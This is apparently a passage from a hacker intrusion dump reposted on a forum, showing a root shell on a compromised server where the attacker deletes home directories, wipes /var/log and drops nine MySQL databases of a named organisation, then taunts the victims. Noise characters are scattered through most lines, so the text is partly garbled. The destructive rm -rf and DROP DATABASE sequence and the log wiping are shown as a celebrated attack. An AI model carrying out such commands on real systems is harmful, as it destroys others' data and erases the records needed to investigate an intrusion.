z: U; N% _& Q, X! h$ S/ N9 n$ T227 Entering Passive Mode (212,254,194,163,2,193)
' W- Z- y0 ^/ P2 ~6 Q$ }+ k150 Opening BINARY mode data connection for ‘file list’.9 h7 E; d/ i4 \+ U- f( D. S0 W
226 Transfer complete.
& ]. ]2 x9 f* r) U T$ p/ Zftp>
- J, m3 u+ |& ~+ p: K2 _- [1 `9 q1 [. O: X p
sh-3.2# cd /home, Y$ H, q4 |0 K5 `3 V) x) Q
sh-3.2# ls -la @7 s. S1 T+ r" g1 y2 o3 H
total 1209 S M! {' d+ m j" u' \
drwxr-xr-x 14 root root 4096 Mar 11 17:56 .
* N2 _$ ~4 i$ N$ f" a% R! ^: |% A# ndrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..: q- S/ M) [* H- J$ d2 l4 Q
drwx–x–x 9 admin admin 4096 Nov 28 2007 admin
$ o9 Y: O# q! L7 V- U-rw——- 1 root root 8192 Jun 4 03:03 aquota.group% b0 o9 q* `3 h* L6 Q! m( n
-rw——- 1 root root 8192 Jun 3 02:45 aquota.user
; i+ k# N+ h; E) f/ P, Qdrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet
8 c- @/ b$ Y0 g& udrwxr-xr-x 2 root root 4096 Jul 29 2008 backup
0 }, B$ `. z$ {6 X; L1 }0 e+ Adrwxr-xr-x 2 root root 4096 Sep 17 2008 backup.141612 _+ P6 H( G: G
drwx–x–x 10 com com 4096 Apr 28 12:40 com
% Y2 H) N q5 c3 X/ G9 n" rdrwxr-xr-x 2 root root 4096 May 17 2007 ftp
( r+ w+ m( U- X& @7 n$ Kdrwx—— 3 jon jon 4096 Sep 21 2007 jon" P. }9 x' \0 j) K$ h
drwx—— 2 root root 16384 Sep 11 2007 lost+found' |# S0 x& e+ o3 \% J+ q. J
drwxr-xr-x 2 root root 4096 Sep 14 2007 my8 ?: Z; F; z+ i4 _* I( v1 q* t0 f
drwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata* y( O- k) B- y% I$ Y# e2 P/ Q* ^8 H
drwx—— 2 jon jon 4096 Sep 15 2007 test
7 b# Y+ @2 d# udrwxrwxrwt 2 root root 4096 Jul 29 2008 tmp, Q% ?1 g6 h* e( u* W7 A, @
; b& u0 F& ]8 tsh-3.2# rm -rf backup// ^9 P) U' h' S
sh-3.2# rm -rf backup.14161/0 \" f4 I; `7 k6 _ H" d6 W
sh-3.2# rm -rf ftp// d; @. O4 D% N0 E
sh-3.2# rm -rf jon/
" `* f0 Q* A2 X ush-3.2# rm -rf my/0 z q* m" x/ Y. O8 \
sh-3.2# rm -rf mysqldata/* J$ \0 W# ~8 g& W4 B- i
sh-3.2# rm -rf test/! A0 \, d# E) I% u t) z
sh-3.2# rm -rf tmp/- H$ B# E, p6 h f
sh-3.2# cd ~+ |7 r# n7 r- [# x; G
sh-3.2# rm -rf *
% N# A6 e5 i+ r- p: O0 dsh-3.2# rm -rf /var/log/
+ j1 i4 F5 B! v( j Y( @: [rm: cannot remove directory `/var/log//proftpd’: Directory not empty
6 j. w3 M; A& y5 I7 Qsh-3.2# rm -rf /home/*
e9 R$ G J% ]" Y/ T1 Msh-3.2# mysql
+ R% y- v- k; f5 p' eWelcome to the MySQL monitor. Commands end with ; or \g.
: o& @5 Z% H& q7 a( W4 b3 x/ ~Your MySQL connection id is 407156& G9 F: X" Q' P; @
Server version: 5.0.45-community-log MySQL Community Edition (GPL)" B. }+ s3 c6 m4 E- Z
. ]- R. C; H0 E3 R( P
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.6 f& `0 a+ B" i9 o# t4 h
' m# m$ _) }4 u; Z& p6 y- Pmysql> show databases;# R# d, J w5 o; I
+———————–+, ^5 n5 c6 G! ]& u
| Database |4 g) @" U/ m# _6 l+ ]2 }
+———————–+
2 p* G: i; _2 X3 Q| information_schema |& R0 X" j; O1 k2 i! t
| astanet_ads |
/ e: l2 V6 }! [( D$ |! E| astanet_mailing_lists |
5 i- _9 s. c% S, || astanet_mediawiki |; |* E! M! c$ I) [6 D& o Q
| astanet_membersystem |
" l2 k! E* U0 U/ P. I; I; G7 m| com_contrexx |
% D. K6 b( F& P# |- n| com_contrexx2 |( c" \* d" f4 G2 |- T
| com_contrexx2_live |
4 y2 [5 n- S" F3 P- L, I0 E| da_roundcube |
* C' O6 }" s( R D| dolphin |
; V. f% \- |* T- c# D" z| ideapool |8 V4 S. B. S, H( k9 i
| mysql |4 L# `. T+ j( h- o! i' N
| test |& P) `- R& ?. w+ L, \9 T4 i
| yourmaster |
$ r3 E7 a5 y j# s, S; [ S+———————–+, ]9 F7 d* k( U$ T; S# @
14 rows in set (0.03 sec)* V- x8 E. L+ r5 j; v2 `: }
* t+ P# K( \) x { r2 tmysql> drop database astanet_membersystem;
4 q! T6 M5 {* I x3 M) m/ X) kdroQuery OK, 46 rows affected (0.81 sec): _4 T8 a+ R. y$ ^ @* D7 B
# A- Y& {% N y0 Rmysql> drop database com_contrexx;
# t% S7 `9 M* \) kQuery OK, 211 rows affected (2.72 sec)+ ^9 u6 c" n! Y- Q3 K
8 E( ]) c- g$ M$ x
mysql> drop database com_contrexx2;
, u6 J# i9 B7 gQuery OK, 237 rows affected (2.23 sec)
5 J+ Q+ n/ i0 T! V
E+ m; k `0 ]# cmysql> drop database com_contrexx2_live;
0 p8 o! i1 W- N% l' D" ]8 |Query OK, 227 rows affected (7.63 sec)
) N$ Q! T4 w% Y- X- \. P) x" B- P5 ~8 { G
mysql> drop database ideapool;) _- i; o5 D+ U" t- A
Query OK, 69 rows affected (0.19 sec)
$ I4 z- h; ?- P' o" q N6 ?
0 y/ I4 E& c% G. }% Q& A; s8 Ymysql> drop database yourmaster;
6 q3 V5 d' q7 x2 l- ]# fQuery OK, 158 rows affected (0.55 sec)
6 z* M! V! q! h& O6 @1 U* G) ?8 l2 Q& U# X, `' v
mysql> drop database astanet_ads;
. X2 L% w* B- s$ u1 l7 [2 pQuery OK, 9 rows affected (0.11 sec)
7 t3 B* ~3 v+ _7 @( C# B0 g" T. x
mysql> drop database astanet_mailing_lists;4 ?1 Q* u: j; a" x3 X
Query OK, 24 rows affected (1.47 sec)
* @ K, x, V5 L& G3 G, w- c; Q" r. [
: }- q S; ^, h, V9 Wmysql> drop database astanet_mediawiki;
* i0 p; o1 C2 T! O& qQuery OK, 31 rows affected (0.51 sec)
0 n @+ G3 ?3 [/ A! q; B* U0 e
' K: ^9 U- H6 U- v: Lmysql> show databases;
: }" ` z2 v' ^: b' w: F, L7 k, L! w$ C+——————–+
, W/ F8 {1 p+ f. ~| Database |
+ T0 A: J0 k* @1 o9 R+——————–+
5 z0 B6 Z* A! k# k- G| information_schema |7 n# { f$ q( G" c
| da_roundcube |
+ a5 M# |# u1 K9 Z' U| dolphin |9 C- f& i' L0 [7 [% ?2 v
| mysql |5 S9 V. k" V* D( v6 z
| test |
$ M4 n$ O% k& L! ^* T7 U+——————–+- U$ g8 O# L. C1 c( [+ O: k! M
5 rows in set (0.00 sec)
" X* J/ T" _( Z; [9 n) i
6 O3 V8 x$ V0 B# p5 fWhat a journey! We’re not sure exactly why the “Terminator” had any influence on
% J, I7 d% j, `! D7 m1 b+ U( V) ]their naming (conventions) but we’re sure Arnold himself wouldn’t be in the7 y( x f% \& m; _2 P, q% o2 \" H M
wrong to say this pack of morons *wont be back*.0 ?2 U2 p% l9 t& F% F: E
|
发表于 2012-11-6 21:07:34
收藏
分享
支持
反对